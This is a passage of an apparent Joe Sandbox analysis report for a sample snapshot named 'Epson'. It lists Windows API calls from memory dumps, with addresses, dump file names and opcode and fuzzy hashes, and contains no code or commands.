                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FE6DBA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                                                                      • Opcode ID: ba2ce988966653c2df8735ae96e4c7867bc20bf61d1e7a05c69b681a8cebcd41
                                                                                                                                                                                                                                      • Instruction ID: f1af94461039f86f7f5eb62854286f49a46132643ed74696a56eb4c9933071cc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba2ce988966653c2df8735ae96e4c7867bc20bf61d1e7a05c69b681a8cebcd41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1514C34A00249EFCF24DF65D880AAE7BB6FF943A4F608159F955DB290D730AD81EB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6c49b6db6f97eafd4533ab90ecd9dd3792081ede6244ef5442498a93fff29130
                                                                                                                                                                                                                                      • Instruction ID: 224d7f1cb567be7f5734512af9b06719bde51b02049c477e908c38ab13f482ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c49b6db6f97eafd4533ab90ecd9dd3792081ede6244ef5442498a93fff29130
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A41EA72A00704BFE725BF78CC41BAA7BEDEF84710F10852AF115DB291D775A9069780
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FC61C8
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00FC61EE
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FC6213
                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FC623F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                                                      • Opcode ID: 2617ce785d742f6cc60792ec3afb81a8351581d132abbc40a0c129dcf8390033
                                                                                                                                                                                                                                      • Instruction ID: 1644252998b922de6cfa15faaca8e09c6c41a3634cabe4c4a38b610ad6b89483
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2617ce785d742f6cc60792ec3afb81a8351581d132abbc40a0c129dcf8390033
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C414F35A00611DFCB11DF54C985A59B7F1AF89751B088488ED4AAF362CB34FD05EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00FBB473
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 00FBB48F
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00FBB4FD
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00FBB54F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                      • Opcode ID: 5f0dcf64914247317f97e53c8f1650b761ffd92f95447eef5b7a30f975beb248
                                                                                                                                                                                                                                      • Instruction ID: 5a068e34206ff4f190d507bc05ed2ab38e0940b18e2a13e9c91dbf95a5010b85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f0dcf64914247317f97e53c8f1650b761ffd92f95447eef5b7a30f975beb248
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8312870E40248AEFF30CF26CC457FE7BB5BB44320F08421AE495561D6C7B48945AF92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00FBB5B8
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FBB5D4
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FBB63B
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00FBB68D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                      • Opcode ID: 60216014380edd157714a5e3d65c89da3aae37de2e60c6af7f8c9ceac8d0dce4
                                                                                                                                                                                                                                      • Instruction ID: a15ee05e3329e05dd5b50643129e99fbf8ed94ee1dcf1c7de5a54bcedb5818ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60216014380edd157714a5e3d65c89da3aae37de2e60c6af7f8c9ceac8d0dce4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B531FB30E4064C6EFF308B66CC057FE7BA7AF85320F04426AE485961D1C7B48E55AF91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00FE80D4
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00FE814A
                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,?), ref: 00FE815A
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00FE81C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                                                                      • Opcode ID: 73294b2fcc95adbe72749498c338d347082c8d3d8676c27773243a4d6be08a94
                                                                                                                                                                                                                                      • Instruction ID: bda27133de76ea07d26a92f5f12be04f758c359c2912c5f772805daca0817c6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73294b2fcc95adbe72749498c338d347082c8d3d8676c27773243a4d6be08a94
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41A630B00295DFCB25EF59C884A6977F5FF45394F244068E9589F265CB39E843EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00FE2187
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FB43AD
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: GetCurrentThreadId.KERNEL32 ref: 00FB43B4
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FB2F00), ref: 00FB43BB
                                                                                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 00FE219B
                                                                                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00FE21E8
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00FE21EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                                                                                      • Opcode ID: 643fc5ac009c9e885e9683351a13262411b78501c9ebce5ac9c9cab32fabfcd0
                                                                                                                                                                                                                                      • Instruction ID: 684bbb2417450fd34d64ff7ef110cb22d449eac273d0c5c0212d5ca8a31b4809
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 643fc5ac009c9e885e9683351a13262411b78501c9ebce5ac9c9cab32fabfcd0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56314171D00249AFC704DFAACCC1CAEB7FCEF58304B54446AE516E7211EA759E45DBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F541EA: _wcslen.LIBCMT ref: 00F541EF
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBE8E2
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBE8F9
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBE924
                                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00FBE92F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3763101759-0
                                                                                                                                                                                                                                      • Opcode ID: e7800be8845a24ade38ee581c9b928a1354758186312313281e0abdeeac0054e
                                                                                                                                                                                                                                      • Instruction ID: 4b006512461f18b9a04415087bbc3c355bfbed93ecd893e11e9b4e856245328b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7800be8845a24ade38ee581c9b928a1354758186312313281e0abdeeac0054e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC21D371D00218EFDB11AFA5CD81BEEB7F8EF45360F148065F908AB241D774AE419BA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00FE9A5D
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FE9A72
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00FE9ABA
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00FE9AF0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                                                      • Opcode ID: 24ccc59dc8be05d3ad45047c77563d8d8049d1a470cd759166529dec6a23700c
                                                                                                                                                                                                                                      • Instruction ID: 8e9f47031e7056d6577093516c4dff8c820019978dc4ad254ffac40f552b46df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24ccc59dc8be05d3ad45047c77563d8d8049d1a470cd759166529dec6a23700c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A721FE31A00058EFCF258F95C888EFE3BB9FF0AB60F504165F9058B1A1C3B99950EB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00FEDC30), ref: 00FBDBA6
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FBDBB5
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FBDBC4
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FEDC30), ref: 00FBDC21
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2267087916-0
                                                                                                                                                                                                                                      • Opcode ID: a33cc3afa0cf664ad0a508e24b77746bbd574c81eb77f84c8b79511347fa4ca7
                                                                                                                                                                                                                                      • Instruction ID: e5fdc43104c7a8017f17d73d4dd11a9fd3c7b4ce26cf0add448cc90ffa1359fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a33cc3afa0cf664ad0a508e24b77746bbd574c81eb77f84c8b79511347fa4ca7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1921C9715043059F8700DF29C8819ABBBE8EF96764F104A1DF499C72A1E730D94AEF43
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FE32A6
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FE32C0
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FE32CE
                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FE32DC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                                                      • Opcode ID: c6cc701aeb895e458b974d81776d430853615b34a831f317ce28d1152495adce
                                                                                                                                                                                                                                      • Instruction ID: f9dd3daccc0c32f38bd486008931f353fb0a87507afdcde563cbfab06dfcd167
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6cc701aeb895e458b974d81776d430853615b34a831f317ce28d1152495adce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2221F131604191AFD7049B25CC4DF6ABB95AF81324F248258F9668B2D2C776EE41D7D0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00FB8271,?,000000FF,?,00FB90BB,00000000,?,0000001C,?,?), ref: 00FB96F3
                                                                                                                                                                                                                                        • Part of subcall function 00FB96E4: lstrcpyW.KERNEL32(00000000,?,?,00FB8271,?,000000FF,?,00FB90BB,00000000,?,0000001C,?,?,00000000), ref: 00FB9719
                                                                                                                                                                                                                                        • Part of subcall function 00FB96E4: lstrcmpiW.KERNEL32(00000000,?,00FB8271,?,000000FF,?,00FB90BB,00000000,?,0000001C,?,?), ref: 00FB974A
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00FB90BB,00000000,?,0000001C,?,?,00000000), ref: 00FB828A
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00FB90BB,00000000,?,0000001C,?,?,00000000), ref: 00FB82B0
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FB90BB,00000000,?,0000001C,?,?,00000000), ref: 00FB82EB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                      • Opcode ID: 945ba1e2893b63f51270ff8a693a8d4711445f74c3f36b554d9fb6e76f10219c
                                                                                                                                                                                                                                      • Instruction ID: e03613f9c6607ce2e4ef83194f0ca843a57ef95fe0038c1327ba6a4c01e35fa7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 945ba1e2893b63f51270ff8a693a8d4711445f74c3f36b554d9fb6e76f10219c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0511293A200341AFCB149F35CC44EBA77E9FF887A0B50402AF942CB250EF759812EB51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00FE615A
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE616C
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE6177
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FE62B5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 455545452-0
                                                                                                                                                                                                                                      • Opcode ID: 3f5b4bbb7b443d454e6bf4d8c74df7f718a7afa8d3ea89daecc2de21255e9041
                                                                                                                                                                                                                                      • Instruction ID: d13dc951ad55e61400a03e33c1ad549392e60f62de4166e8c80e8133d841cf24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f5b4bbb7b443d454e6bf4d8c74df7f718a7afa8d3ea89daecc2de21255e9041
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11D636A0029C9ADB21DF668C84EEF777CEB25BA4F10402BF915D9181EB74C940EB61
                                                                                                                                                                                                                                      Memory Dump Source
